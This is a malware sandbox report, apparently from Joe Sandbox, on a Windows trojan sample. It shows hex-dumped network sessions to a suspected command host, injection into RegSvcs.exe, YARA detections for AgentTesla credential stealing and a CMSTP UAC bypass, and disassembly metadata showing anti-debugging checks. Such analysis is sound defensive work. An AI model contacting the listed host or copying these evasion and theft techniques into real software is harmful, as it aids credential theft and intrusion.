                                                                                2024-02-23 13:28:21 UTC1370INData Raw: 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 39 35 62 38 34 65 65 36 62 63 33 34 2e 6a 73 22 3e 3c 2f 73 63 72 69
                                                                                Data Ascii: s"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-95b84ee6bc34.js"></scri
                                                                                2024-02-23 13:28:21 UTC1370INData Raw: 62 35 39 61 32 62 32 38 32 37 61 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 68 74 2d 38 33 63 32 33 35 2d 62 38 35 65 39 66 34
                                                                                Data Ascii: b59a2b2827ad.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-b85e9f4


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.851842172.67.190.934435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-02-23 13:28:25 UTC143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                2024-02-23 13:28:25 UTC161INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                2024-02-23 13:28:25 UTC155INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.852896172.67.190.934435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-02-23 13:28:28 UTC113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                2024-02-23 13:28:28 UTC161INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                2024-02-23 13:28:28 UTC155INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.853182102.223.20.2174435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-02-23 13:28:29 UTC143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                2024-02-23 13:28:30 UTC192INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:30 GMT
                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                Content-Length: 638
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                2024-02-23 13:28:30 UTC638INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.855101222.255.238.1594435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-02-23 13:28:41 UTC143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                2024-02-23 13:28:42 UTC192INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:42 GMT
                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                Content-Length: 638
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                2024-02-23 13:28:42 UTC638INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:14:28:18
                                                                                Start date:23/02/2024
                                                                                Path:C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                Imagebase:0x194c4400000
                                                                                File size:40'960 bytes
                                                                                MD5 hash:26C95E5ACBA77D7FD14D109C94F75CCA
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2049795050.00000194D9427000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2049795050.00000194D9427000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2049795050.00000194D80E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2049795050.00000194D80E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:4
                                                                                Start time:14:28:46
                                                                                Start date:23/02/2024
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                                                                                Imagebase:0x9b0000
                                                                                File size:45'984 bytes
                                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2757087631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2757087631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2764598895.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2764598895.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2764598895.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2764598895.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:11%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:2.9%
                                                                                  Total number of Nodes:103
                                                                                  Total number of Limit Nodes:12
                                                                                  execution_graph 39883 65b3858 DuplicateHandle 39884 65b38ee 39883->39884 39895 fd70a8 39896 fd70ec CheckRemoteDebuggerPresent 39895->39896 39897 fd712e 39896->39897 39898 fd0848 39900 fd084e 39898->39900 39899 fd091b 39900->39899 39904 65b24f8 39900->39904 39908 65b2508 39900->39908 39912 fd1382 39900->39912 39905 65b2517 39904->39905 39916 65b1cec 39905->39916 39909 65b2517 39908->39909 39910 65b1cec 3 API calls 39909->39910 39911 65b2538 39910->39911 39911->39900 39914 fd1396 39912->39914 39913 fd14ae 39913->39900 39914->39913 39993 fd8268 39914->39993 39917 65b1cf7 39916->39917 39920 65b3454 39917->39920 39919 65b3ebe 39919->39919 39921 65b345f 39920->39921 39922 65b45e4 39921->39922 39924 65b6268 39921->39924 39922->39919 39925 65b6289 39924->39925 39926 65b62ad 39925->39926 39928 65b6418 39925->39928 39926->39922 39929 65b6425 39928->39929 39930 65b645e 39929->39930 39932 65b517c 39929->39932 39930->39926 39933 65b5187 39932->39933 39935 65b64d0 39933->39935 39936 65b51b0 39933->39936 39935->39935 39937 65b51bb 39936->39937 39943 65b51c0 39937->39943 39939 65b653f 39947 65bb760 39939->39947 39956 65bb748 39939->39956 39940 65b6579 39940->39935 39944 65b51cb 39943->39944 39945 65b76e0 39944->39945 39946 65b6268 3 API calls 39944->39946 39945->39939 39946->39945 39949 65bb791 39947->39949 39951 65bb891 39947->39951 39948 65bb79d 39948->39940 39949->39948 39965 65bb9d8 39949->39965 39968 65bb9d6 39949->39968 39950 65bb7dd 39972 65bccc9 39950->39972 39976 65bccd8 39950->39976 39951->39940 39958 65bb791 39956->39958 39959 65bb891 39956->39959 39957 65bb79d 39957->39940 39958->39957 39961 65bb9d8 2 API calls 39958->39961 39962 65bb9d6 2 API calls 39958->39962 39959->39940 39960 65bb7dd 39963 65bccc9 CreateWindowExW 39960->39963 39964 65bccd8 CreateWindowExW 39960->39964 39961->39960 39962->39960 39963->39959 39964->39959 39980 65bba18 39965->39980 39966 65bb9e2 39966->39950 39969 65bb9d8 39968->39969 39971 65bba18 2 API calls 39969->39971 39970 65bb9e2 39970->39950 39971->39970 39974 65bcd03 39972->39974 39973 65bcdb2 39973->39973 39974->39973 39988 65bdfc5 39974->39988 39977 65bcd03 39976->39977 39978 65bcdb2 39977->39978 39979 65bdfc5 CreateWindowExW 39977->39979 39979->39978 39981 65bba1d 39980->39981 39982 65bba5c 39981->39982 39986 65bbcb3 LoadLibraryExW 39981->39986 39987 65bbcc0 LoadLibraryExW 39981->39987 39982->39966 39983 65bba54 39983->39982 39984 65bbc60 GetModuleHandleW 39983->39984 39985 65bbc8d 39984->39985 39985->39966 39986->39983 39987->39983 39989 65bdfc9 39988->39989 39990 65bdffd CreateWindowExW 39988->39990 39989->39973 39992 65be134 39990->39992 39994 fd8272 39993->39994 39995 fd828c 39994->39995 39998 65df618 39994->39998 40004 65df608 39994->40004 39995->39914 40000 65df62d 39998->40000 39999 65df842 39999->39995 40000->39999 40001 65dfec8 GlobalMemoryStatusEx GlobalMemoryStatusEx 40000->40001 40002 65dfc70 GlobalMemoryStatusEx GlobalMemoryStatusEx 40000->40002 40003 65dfc60 GlobalMemoryStatusEx GlobalMemoryStatusEx 40000->40003 40001->40000 40002->40000 40003->40000 40005 65df62d 40004->40005 40006 65df842 40005->40006 40007 65dfec8 GlobalMemoryStatusEx GlobalMemoryStatusEx 40005->40007 40008 65dfc70 GlobalMemoryStatusEx GlobalMemoryStatusEx 40005->40008 40009 65dfc60 GlobalMemoryStatusEx GlobalMemoryStatusEx 40005->40009 40006->39995 40007->40005 40008->40005 40009->40005 39885 65b3610 39886 65b3656 GetCurrentProcess 39885->39886 39888 65b36a8 GetCurrentThread 39886->39888 39889 65b36a1 39886->39889 39890 65b36de 39888->39890 39891 65b36e5 GetCurrentProcess 39888->39891 39889->39888 39890->39891 39894 65b371b 39891->39894 39892 65b3743 GetCurrentThreadId 39893 65b3774 39892->39893 39894->39892

                                                                                  Executed Functions

                                                                                  Function 00FDAD10 Relevance: 3.1, Instructions: 3142COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2760392146.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_fd0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b0470eca1e99dfee8f27402f32068b3d188a4816d33605bc68fcb04ec14b2ba8
                                                                                  • Instruction ID: 2634c687793a7e7c86e712a80f16e56b04c908a705f2422166b22e873c69c3a3
                                                                                  • Opcode Fuzzy Hash: b0470eca1e99dfee8f27402f32068b3d188a4816d33605bc68fcb04ec14b2ba8
                                                                                  • Instruction Fuzzy Hash: D063FC31D1071A8EDB11EF68C8846A9F7B1FF99300F15D69AE45877221EB70AAD4CF81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D5178 Relevance: 1.8, Strings: 1, Instructions: 583COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 663 65d5178-65d5195 664 65d5197-65d519a 663->664 665 65d51a0-65d51a3 664->665 666 65d5242-65d5248 664->666 669 65d51aa-65d51ad 665->669 670 65d51a5-65d51a7 665->670 667 65d5278-65d5282 666->667 668 65d524a 666->668 680 65d5289-65d528b 667->680 673 65d524f-65d5252 668->673 671 65d51af-65d51b5 669->671 672 65d51e5-65d51e8 669->672 670->669 674 65d534f-65d537b 671->674 675 65d51bb-65d51c3 671->675 678 65d51ea-65d5200 672->678 679 65d5205-65d5208 672->679 676 65d5268-65d526b 673->676 677 65d5254-65d5263 673->677 702 65d5385-65d5388 674->702 675->674 681 65d51c9-65d51d6 675->681 682 65d526d-65d526e 676->682 683 65d5273-65d5276 676->683 677->676 678->679 684 65d520a-65d520d 679->684 685 65d5212-65d5215 679->685 686 65d5290-65d5293 680->686 681->674 687 65d51dc-65d51e0 681->687 682->683 683->667 683->686 684->685 690 65d522e-65d5231 685->690 691 65d5217-65d5229 685->691 693 65d5295-65d529b 686->693 694 65d52a6-65d52a9 686->694 687->672 697 65d523d-65d5240 690->697 698 65d5233-65d523c 690->698 691->690 693->671 699 65d52a1 693->699 695 65d52ab-65d52b2 694->695 696 65d52b7-65d52ba 694->696 695->696 696->693 700 65d52bc-65d52bf 696->700 697->666 697->673 699->694 703 65d52c1-65d52ce 700->703 704 65d52d3-65d52d6 700->704 705 65d5399-65d539c 702->705 706 65d538a-65d5394 702->706 703->704 709 65d52d8-65d52dc 704->709 710 65d52e3-65d52e6 704->710 707 65d53be-65d53c1 705->707 708 65d539e-65d53a2 705->708 706->705 714 65d53d5-65d53d8 707->714 715 65d53c3-65d53ca 707->715 712 65d53a8-65d53b0 708->712 713 65d5476-65d54b4 708->713 717 65d52de 709->717 718 65d5341-65d534e 709->718 719 65d52e8-65d52eb 710->719 720 65d52f0-65d52f3 710->720 712->713 721 65d53b6-65d53b9 712->721 734 65d54b6-65d54b9 713->734 724 65d53fa-65d53fd 714->724 725 65d53da-65d53de 714->725 722 65d546e-65d5475 715->722 723 65d53d0 715->723 717->710 719->720 726 65d5319-65d531c 720->726 727 65d52f5-65d5314 720->727 721->707 723->714 732 65d53ff-65d5403 724->732 733 65d5417-65d541a 724->733 725->713 731 65d53e4-65d53ec 725->731 729 65d532f-65d5331 726->729 730 65d531e-65d5324 726->730 727->726 738 65d5338-65d533b 729->738 739 65d5333 729->739 730->684 737 65d532a 730->737 731->713 740 65d53f2-65d53f5 731->740 732->713 741 65d5405-65d540d 732->741 735 65d541c-65d542d 733->735 736 65d5432-65d5435 733->736 743 65d54bb-65d54cc 734->743 744 65d54d3-65d54d6 734->744 735->736 745 65d544f-65d5452 736->745 746 65d5437-65d543b 736->746 737->729 738->664 738->718 739->738 740->724 741->713 747 65d540f-65d5412 741->747 761 65d54ce 743->761 762 65d551b-65d5522 743->762 751 65d54dc-65d54df 744->751 752 65d559b-65d572f 744->752 753 65d545c-65d545e 745->753 754 65d5454-65d545b 745->754 746->713 750 65d543d-65d5445 746->750 747->733 750->713 756 65d5447-65d544a 750->756 757 65d54f9-65d54fc 751->757 758 65d54e1-65d54f2 751->758 812 65d5865-65d5878 752->812 813 65d5735-65d573c 752->813 759 65d5465-65d5468 753->759 760 65d5460 753->760 756->745 764 65d54fe-65d550f 757->764 765 65d5516-65d5519 757->765 758->762 771 65d54f4 758->771 759->702 759->722 760->759 761->744 766 65d5527-65d552a 762->766 764->743 773 65d5511 764->773 765->762 765->766 768 65d552c-65d553d 766->768 769 65d5544-65d5547 766->769 768->762 780 65d553f 768->780 774 65d555f-65d5562 769->774 775 65d5549-65d555c 769->775 771->757 773->765 778 65d5564-65d556b 774->778 779 65d5570-65d5573 774->779 778->779 782 65d558d-65d5590 779->782 783 65d5575-65d5586 779->783 780->769 782->752 784 65d5592-65d5595 782->784 783->775 788 65d5588 783->788 784->752 787 65d587b-65d587e 784->787 789 65d5888-65d588a 787->789 790 65d5880-65d5885 787->790 788->782 792 65d588c 789->792 793 65d5891-65d5894 789->793 790->789 792->793 793->734 795 65d589a-65d58a3 793->795 814 65d57f0-65d57f7 813->814 815 65d5742-65d5765 813->815 814->812 817 65d57f9-65d582c 814->817 824 65d576d-65d5775 815->824 828 65d582e 817->828 829 65d5831-65d585e 817->829 826 65d577a-65d57bb 824->826 827 65d5777 824->827 837 65d57bd-65d57ce 826->837 838 65d57d3-65d57e4 826->838 827->826 828->829 829->795 829->812 837->795 838->795
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $
                                                                                  • API String ID: 0-3993045852
                                                                                  • Opcode ID: 3cee9e7ac64b0c77d0835dd34344fa4be64723af485f85fac0c7e2fc9d65db32
                                                                                  • Instruction ID: fe1cff22c0e69598554bd726b384a0b7377247b96bfac8b08699c1b36c13eb09
                                                                                  • Opcode Fuzzy Hash: 3cee9e7ac64b0c77d0835dd34344fa4be64723af485f85fac0c7e2fc9d65db32
                                                                                  • Instruction Fuzzy Hash: 9C22C271E002158FDF64DBA8C4806AEBBB2FF89310F24846AD855EB391EA35DD45CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00FD70A8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1068 fd70a8-fd712c CheckRemoteDebuggerPresent 1070 fd712e-fd7134 1068->1070 1071 fd7135-fd7170 1068->1071 1070->1071
                                                                                  APIs
                                                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00FD711F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2760392146.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_fd0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID: CheckDebuggerPresentRemote
                                                                                  • String ID:
                                                                                  • API String ID: 3662101638-0
                                                                                  • Opcode ID: d57b62adb28f411e17ce5214f794539761cb99bbfd9c4fdaf2bfbf5c16ad60c4
                                                                                  • Instruction ID: 679abf75faecd710b38bc849fc591cac5326538b66461174ba5e0f9cad36e637
                                                                                  • Opcode Fuzzy Hash: d57b62adb28f411e17ce5214f794539761cb99bbfd9c4fdaf2bfbf5c16ad60c4
                                                                                  • Instruction Fuzzy Hash: 272145B180025A8FDB10DFAAD884BEEFBF5AF48320F14841AE458A7340D778A944CF60
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D2358 Relevance: 1.5, Instructions: 1489COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c66e3dc80a1e630f4143df42c8f9aa3f13800fddd21683b795f06ce496dfa34c
                                                                                  • Instruction ID: 2e24af4db77c7964c180f5a7022a2f424b33580af29a55c6cbdddb0f4884f7c3
                                                                                  • Opcode Fuzzy Hash: c66e3dc80a1e630f4143df42c8f9aa3f13800fddd21683b795f06ce496dfa34c
                                                                                  • Instruction Fuzzy Hash: 14D23730A00205CFDB64DB68C494A9DB7B2FF89310F54C5AAD419AB3A5EB35ED85CF81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00FD3EB0 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2760392146.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_fd0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: \VRm
                                                                                  • API String ID: 0-1931484983
                                                                                  • Opcode ID: 9993e0b49914ec92955bd0538faa565392c7104f0b30f31092bbcf03255f32c6
                                                                                  • Instruction ID: 896ec0364793ca1f4ac057ff53cd615cdf17ecdd97796cf385be3b12eda13be6
                                                                                  • Opcode Fuzzy Hash: 9993e0b49914ec92955bd0538faa565392c7104f0b30f31092bbcf03255f32c6
                                                                                  • Instruction Fuzzy Hash: 5C916C70E00209CFDF14DFA9C88579DBBF2AF88714F18812AE415A7394DB759885DB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D65C8 Relevance: .8, Instructions: 808COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 58d530d7cb27ba2bd86b85bc209d748d418ea685cfe8bbc4034b4fe8ce867b9e
